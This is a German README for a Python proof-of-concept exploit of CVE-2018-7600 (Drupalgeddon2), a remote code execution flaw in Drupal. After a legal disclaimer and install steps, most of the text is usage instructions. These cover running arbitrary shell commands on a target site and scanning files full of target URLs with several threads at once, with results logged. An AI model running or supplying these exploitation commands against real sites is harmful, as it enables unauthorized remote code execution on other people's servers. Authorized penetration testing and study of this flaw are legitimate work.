
Dieses Repository präsentiert einen vollständig selbst entwickelten Proof-of-Concept (PoC) für CVE-2018-7600, allgemein bekannt als Drupalgeddon 2. Diese kritische Schwachstelle im Kern von Drupal 7 und 8 ermöglicht Remote Code Execution (RCE), und der PoC demonstriert deren Ausnutzung auf klare und lehrreiche Weise.
Dieses Repository enthält einen Python-basierten Proof-of-Concept-Exploit für die kritische Remote-Code-Execution-Schwachstelle in Drupal, bekannt als Drupalgeddon2 (CVE-2018-7600). Dieses Skript dient Bildungszwecken und für Sicherheitsexperten, die es in autorisierten Penetrationstest-Szenarien einsetzen.
Dieses Tool ist ausschließlich für legale und ethische Zwecke bestimmt. Die Verwendung dieses Skripts auf einem System ohne ausdrückliche Genehmigung des Eigentümers ist illegal. Der Autor und die Mitwirkenden sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden. Nutzung auf eigene Gefahr.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
Das Skript bietet mehrere Befehlszeilenargumente zur Anpassung seiner Ausführung.
Ein einzelnes Ziel mit dem Standardbefehl (whoami) ausnutzen:
python3 drupalgeddon2.py -t http://example.com
Ein einzelnes Ziel mit einem benutzerdefinierten Befehl ausnutzen (z. B. ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Eine Liste von Zielen aus einer Datei scannen:
Erstellen Sie eine Datei namens targets.txt mit einer URL pro Zeile:
http://site1.com
https://site2.org
http://site3.net
Führen Sie dann das Skript aus:
python3 drupalgeddon2.py -l targets.txt
Eine Liste mit einem benutzerdefinierten Befehl und erhöhter Thread-Anzahl scannen:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Die Ausgabe in einer Logdatei speichern:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Short | Beschreibung | Standard |
|---|
--target | -t | Eine einzelne Ziel-URL. | - |
--list | -l | Pfad zu einer Datei mit einer Liste von Ziel-URLs. | - |
--command | -c | Der Befehl, der auf dem Ziel ausgeführt werden soll. | whoami |
--threads | -T | Anzahl der gleichzeitig verwendeten Threads. | 5 |
--output | -o | Datei, in die die Ausgabe protokolliert wird. | - |
--timeout | Anforderungs-Timeout in Sekunden. | 15 |